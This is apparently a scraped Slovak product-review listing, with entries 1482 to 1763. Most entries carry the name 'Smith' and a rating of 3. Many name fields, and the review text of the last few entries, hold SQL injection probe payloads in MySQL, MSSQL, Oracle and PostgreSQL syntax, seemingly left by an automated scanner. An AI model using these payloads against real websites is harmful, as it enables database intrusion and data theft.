 1482. -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA
  Recenzované dňa

  3

 1483. Smith
  Recenzované dňa

  3

 1484. Smith
  Recenzované dňa

  3

 1485. '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
  Recenzované dňa

  3

 1486. Smith
  Recenzované dňa

  3

 1487. '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
  Recenzované dňa

  3

 1488. (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
  Recenzované dňa

  3

 1489. Smith
  Recenzované dňa

  3

 1490. 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
  Recenzované dňa

  3

 1491. Smith
  Recenzované dňa

  3

 1492. -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
  Recenzované dňa

  3

 1493. Smith
  Recenzované dňa

  3

 1494. Smith
  Recenzované dňa

  3

 1495. -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  Recenzované dňa

  3

 1496. Smith
  Recenzované dňa

  3

 1497. (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
  Recenzované dňa

  3

 1498. Smith
  Recenzované dňa

  3

 1499. Smith
  Recenzované dňa

  3

 1500. '+NSFTW+'
  Recenzované dňa

  3

 1501. Smith
  Recenzované dňa

  3

 1502. Smith
  Recenzované dňa

  3

 1503. NSFTW
  Recenzované dňa

  3

 1504. Smith
  Recenzované dňa

  3

 1505. Smith
  Recenzované dňa

  3

 1506. (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
  Recenzované dňa

  3

 1507. Smith
  Recenzované dňa

  3

 1508. Smith
  Recenzované dňa

  3

 1509. '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
  Recenzované dňa

  3

 1510. Smith
  Recenzované dňa

  3

 1511. Smith
  Recenzované dňa

  3

 1512. Smith
  Recenzované dňa

  3

 1513. Smith
  Recenzované dňa

  3

 1514. Smith
  Recenzované dňa

  3

 1515. Smith
  Recenzované dňa

  3

 1516. Smith
  Recenzované dňa

  3

 1517. Smith
  Recenzované dňa

  3

 1518. Smith
  Recenzované dňa

  3

 1519. Smith
  Recenzované dňa

  3

 1520. Smith
  Recenzované dňa

  3

 1521. Smith
  Recenzované dňa

  3

 1522. Smith
  Recenzované dňa

  3

 1523. Smith
  Recenzované dňa

  3

 1524. Smith
  Recenzované dňa

  3

 1525. cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
  Recenzované dňa

  3

 1526. Smith
  Recenzované dňa

  3

 1527. Smith
  Recenzované dňa

  3

 1528. (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
  Recenzované dňa

  3

 1529. Smith
  Recenzované dňa

  3

 1530. Smith
  Recenzované dňa

  3

 1531. Smith
  Recenzované dňa

  3

 1532. Smith
  Recenzované dňa

  3

 1533. Smith
  Recenzované dňa

  3

 1534. Smith
  Recenzované dňa

  3

 1535. Smith
  Recenzované dňa

  3

 1536. Smith
  Recenzované dňa

  3

 1537. Smith
  Recenzované dňa

  3

 1538. Smith
  Recenzované dňa

  3

 1539. Smith
  Recenzované dňa

  3

 1540. Smith
  Recenzované dňa

  3

 1541. Smith
  Recenzované dňa

  3

 1542. Smith
  Recenzované dňa

  3

 1543. Smith
  Recenzované dňa

  3

 1544. Smith
  Recenzované dňa

  3

 1545. Smith
  Recenzované dňa

  3

 1546. Smith
  Recenzované dňa

  3

 1547. Smith
  Recenzované dňa

  3

 1548. Smith
  Recenzované dňa

  3

 1549. Smith
  Recenzované dňa

  3

 1550. Smith
  Recenzované dňa

  3

 1551. Smith
  Recenzované dňa

  3

 1552. Smith
  Recenzované dňa

  3

 1553. Smith
  Recenzované dňa

  3

 1554. Smith
  Recenzované dňa

  3

 1555. Smith
  Recenzované dňa

  3

 1556. Smith
  Recenzované dňa

  3

 1557. Smith
  Recenzované dňa

  3

 1558. Smith
  Recenzované dňa

  3

 1559. -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
  Recenzované dňa

  3

 1560. -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  Recenzované dňa

  3

 1561. Smith
  Recenzované dňa

  3

 1562. -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
  Recenzované dňa

  3

 1563. Smith
  Recenzované dňa

  3

 1564. Smith
  Recenzované dňa

  3

 1565. Smith
  Recenzované dňa

  3

 1566. Smith
  Recenzované dňa

  3

 1567. Smith
  Recenzované dňa

  3

 1568. Smith
  Recenzované dňa

  3

 1569. 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
  Recenzované dňa

  3

 1570. Smith
  Recenzované dňa

  3

 1571. convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
  Recenzované dňa

  3

 1572. Smith
  Recenzované dňa

  3

 1573. '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
  Recenzované dňa

  3

 1574. Smith
  Recenzované dňa

  3

 1575. (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
  Recenzované dňa

  3

 1576. Smith
  Recenzované dňa

  3

 1577. %27
  Recenzované dňa

  3

 1578. Smith
  Recenzované dňa

  3

 1579. Smith
  Recenzované dňa

  3

 1580. Smith
  Recenzované dňa

  3

 1581. Smith
  Recenzované dňa

  3

 1582. Smith
  Recenzované dňa

  3

 1583. Smith
  Recenzované dňa

  3

 1584. Smith
  Recenzované dňa

  3

 1585. Smith
  Recenzované dňa

  3

 1586. Smith
  Recenzované dňa

  3

 1587. Smith
  Recenzované dňa

  3

 1588. Smith
  Recenzované dňa

  3

 1589. Smith
  Recenzované dňa

  3

 1590. Smith
  Recenzované dňa

  3

 1591. Smith
  Recenzované dňa

  3

 1592. Smith
  Recenzované dňa

  3

 1593. Smith
  Recenzované dňa

  3

 1594. Smith
  Recenzované dňa

  3

 1595. Smith
  Recenzované dňa

  3

 1596. Smith
  Recenzované dňa

  3

 1597. Smith
  Recenzované dňa

  3

 1598. Smith
  Recenzované dňa

  3

 1599. Smith
  Recenzované dňa

  3

 1600. Smith
  Recenzované dňa

  3

 1601. Smith
  Recenzované dňa

  3

 1602. Smith
  Recenzované dňa

  3

 1603. Smith
  Recenzované dňa

  3

 1604. Smith
  Recenzované dňa

  3

 1605. Smith
  Recenzované dňa

  3

 1606. Smith
  Recenzované dňa

  3

 1607. Smith
  Recenzované dňa

  3

 1608. Smith
  Recenzované dňa

  3

 1609. Smith
  Recenzované dňa

  3

 1610. Smith
  Recenzované dňa

  3

 1611. Smith
  Recenzované dňa

  3

 1612. Smith
  Recenzované dňa

  3

 1613. Smith
  Recenzované dňa

  3

 1614. Smith
  Recenzované dňa

  3

 1615. Smith
  Recenzované dňa

  3

 1616. Smith
  Recenzované dňa

  3

 1617. Smith
  Recenzované dňa

  3

 1618. Smith
  Recenzované dňa

  3

 1619. Smith
  Recenzované dňa

  3

 1620. Smith
  Recenzované dňa

  3

 1621. Smith
  Recenzované dňa

  3

 1622. Smith
  Recenzované dňa

  3

 1623. Smith
  Recenzované dňa

  3

 1624. Smith
  Recenzované dňa

  3

 1625. Smith
  Recenzované dňa

  3

 1626. Smith
  Recenzované dňa

  3

 1627. Smith
  Recenzované dňa

  3

 1628. Smith
  Recenzované dňa

  3

 1629. Smith
  Recenzované dňa

  3

 1630. Smith
  Recenzované dňa

  3

 1631. Smith
  Recenzované dňa

  3

 1632. Smith
  Recenzované dňa

  3

 1633. Smith
  Recenzované dňa

  3

 1634. Smith
  Recenzované dňa

  3

 1635. Smith
  Recenzované dňa

  3

 1636. Smith
  Recenzované dňa

  3

 1637. Smith
  Recenzované dňa

  3

 1638. Smith
  Recenzované dňa

  3

 1639. Smith
  Recenzované dňa

  3

 1640. Smith
  Recenzované dňa

  3

 1641. Smith
  Recenzované dňa

  3

 1642. Smith
  Recenzované dňa

  3

 1643. Smith
  Recenzované dňa

  3

 1644. Smith
  Recenzované dňa

  3

 1645. Smith
  Recenzované dňa

  3

 1646. Smith
  Recenzované dňa

  3

 1647. Smith
  Recenzované dňa

  3

 1648. Smith
  Recenzované dňa

  3

 1649. Smith
  Recenzované dňa

  3

 1650. Smith
  Recenzované dňa

  3

 1651. Smith
  Recenzované dňa

  3

 1652. Smith
  Recenzované dňa

  3

 1653. Smith
  Recenzované dňa

  3

 1654. Smith
  Recenzované dňa

  3

 1655. Smith
  Recenzované dňa

  3

 1656. Smith
  Recenzované dňa

  3

 1657. Smith
  Recenzované dňa

  3

 1658. Smith
  Recenzované dňa

  3

 1659. Smith
  Recenzované dňa

  3

 1660. Smith
  Recenzované dňa

  3

 1661. Smith
  Recenzované dňa

  3

 1662. Smith
  Recenzované dňa

  3

 1663. Smith
  Recenzované dňa

  3

 1664. Smith
  Recenzované dňa

  3

 1665. Smith
  Recenzované dňa

  3

 1666. Smith
  Recenzované dňa

  3

 1667. Smith
  Recenzované dňa

  3

 1668. Smith
  Recenzované dňa

  3

 1669. Smith
  Recenzované dňa

  3

 1670. Smith
  Recenzované dňa

  3

 1671. Smith
  Recenzované dňa

  3

 1672. Smith
  Recenzované dňa

  3

 1673. Smith
  Recenzované dňa

  3

 1674. Smith
  Recenzované dňa

  3

 1675. Smith
  Recenzované dňa

  3

 1676. Smith
  Recenzované dňa

  3

 1677. Smith
  Recenzované dňa

  3

 1678. Smith
  Recenzované dňa

  3

 1679. Smith
  Recenzované dňa

  3

 1680. Smith
  Recenzované dňa

  3

 1681. Smith
  Recenzované dňa

  3

 1682. Smith
  Recenzované dňa

  3

 1683. Smith
  Recenzované dňa

  3

 1684. Smith
  Recenzované dňa

  3

 1685. Smith
  Recenzované dňa

  3

 1686. Smith
  Recenzované dňa

  3

 1687. Smith
  Recenzované dňa

  3

 1688. Smith
  Recenzované dňa

  3

 1689. Smith
  Recenzované dňa

  3

 1690. Smith
  Recenzované dňa

  3

 1691. Smith
  Recenzované dňa

  3

 1692. Smith
  Recenzované dňa

  3

 1693. Smith
  Recenzované dňa

  3

 1694. Smith
  Recenzované dňa

  3

 1695. Smith
  Recenzované dňa

  3

 1696. Smith
  Recenzované dňa

  3

 1697. Smith
  Recenzované dňa

  3

 1698. Smith
  Recenzované dňa

  3

 1699. Smith
  Recenzované dňa

  3

 1700. Smith
  Recenzované dňa

  3

 1701. Smith
  Recenzované dňa

  3

 1702. Smith
  Recenzované dňa

  3

 1703. Smith
  Recenzované dňa

  3

 1704. Smith
  Recenzované dňa

  3

 1705. Smith
  Recenzované dňa

  3

 1706. Smith
  Recenzované dňa

  3

 1707. Smith
  Recenzované dňa

  3

 1708. Smith
  Recenzované dňa

  3

 1709. Smith
  Recenzované dňa

  3

 1710. Smith
  Recenzované dňa

  3

 1711. Smith
  Recenzované dňa

  3

 1712. Smith
  Recenzované dňa

  3

 1713. Smith
  Recenzované dňa

  3

 1714. Smith
  Recenzované dňa

  3

 1715. Smith
  Recenzované dňa

  3

 1716. Smith
  Recenzované dňa

  3

 1717. Smith
  Recenzované dňa

  3

 1718. Smith
  Recenzované dňa

  3

 1719. Smith
  Recenzované dňa

  3

 1720. Smith
  Recenzované dňa

  3

 1721. Smith
  Recenzované dňa

  3

 1722. Smith
  Recenzované dňa

  3

 1723. Smith
  Recenzované dňa

  3

 1724. Smith
  Recenzované dňa

  3

 1725. Smith
  Recenzované dňa

  3

 1726. Smith
  Recenzované dňa

  3

 1727. Smith
  Recenzované dňa

  3

 1728. Smith
  Recenzované dňa

  3

 1729. Smith
  Recenzované dňa

  3

 1730. Smith
  Recenzované dňa

  3

 1731. Smith
  Recenzované dňa

  3

 1732. Smith
  Recenzované dňa

  3

 1733. Smith
  Recenzované dňa

  3

 1734. Smith
  Recenzované dňa

  3

 1735. Smith
  Recenzované dňa

  3

 1736. Smith
  Recenzované dňa

  3

 1737. Smith
  Recenzované dňa

  3

 1738. Smith
  Recenzované dňa

  3

 1739. Smith
  Recenzované dňa

  3

 1740. Smith
  Recenzované dňa

  3

 1741. Smith
  Recenzované dňa

  3

 1742. Smith
  Recenzované dňa

  3

 1743. Smith
  Recenzované dňa

  3

 1744. Smith
  Recenzované dňa

  3

 1745. Smith
  Recenzované dňa

  3

 1746. Smith
  Recenzované dňa

  3

 1747. Smith
  Recenzované dňa

  3

 1748. Smith
  Recenzované dňa

  3

 1749. Smith
  Recenzované dňa

  3

 1750. Smith
  Recenzované dňa

  3

 1751. Smith
  Recenzované dňa

  3

 1752. Smith
  Recenzované dňa

  3

 1753. Smith
  Recenzované dňa

  3

 1754. Smith
  Recenzované dňa

  3

 1755. Smith
  Recenzované dňa

  3

 1756. Smith
  Recenzované dňa

  3

 1757. Smith
  Recenzované dňa

  -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1

 1758. Smith
  Recenzované dňa

  -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

 1759. Smith
  Recenzované dňa

  '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

 1760. Smith
  Recenzované dňa

  '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

 1761. Smith
  Recenzované dňa

  (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

 1762. Smith
  Recenzované dňa

  1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

 1763. Smith
  Recenzované dňa

  -1\'+(select 1 and row(1,1)